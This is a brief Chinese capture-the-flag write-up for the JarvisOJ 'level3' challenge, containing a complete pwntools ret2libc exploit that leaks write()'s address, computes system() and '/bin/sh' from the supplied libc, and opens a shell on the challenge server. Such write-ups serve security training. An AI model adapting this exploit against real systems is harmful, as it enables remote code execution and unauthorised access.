题目来自:https://www.jarvisoj.com/challenges
level3
checksec查看:
ida打开:
栈溢出,buf与ebp相距0x88(136)
一起下载到的还有个libc-2.19.so动态链接库文件,这就很好办啦!二次溢出拿到flag
直接上脚本:
from pwn import *
#sh = process('level3')
sh = remote('pwn2.jarvisoj.com',9879)
elf = ELF('level3')
libcso = ELF('libc-2.19.so')
write_plt = elf.symbols['write']
write_got = elf.got['write']
func_addr = 0x0804844B
payload = 'A'*140 +p32(write_plt)+p32(func_addr)+p32(1)+p32(write_got)+p32(4)#利用函数vul来读取我们的payload2,所以把write函数的返回地址设为vul的 地址
print '\n[+]-----send payload-------'
sh.recvuntil('Input:\n')
sh.send(payload)
print '\n---write()address---'
write_addr = u32(sh.recv(4))
print 'writ_addr='+hex(write_addr)
print '\n[+]----find system() and /bin/sh-----'
sys_addr = write_addr-(libcso.symbols['write']-libcso.symbols['system'])
print libcso.symbols['write']
binsh_addr = write_addr-(libcso.symbols['write']-next(libcso.search('/bin/sh')))
payload2 = 'B'*140 +p32(sys_addr)+'b'*4+p32(binsh_addr)
print '[+]----send payload2----'
sh.recvuntil('Input:\n')
sh.send(payload2)
sh.interactive()
得到flag。
leve4脚本没调完,明天再战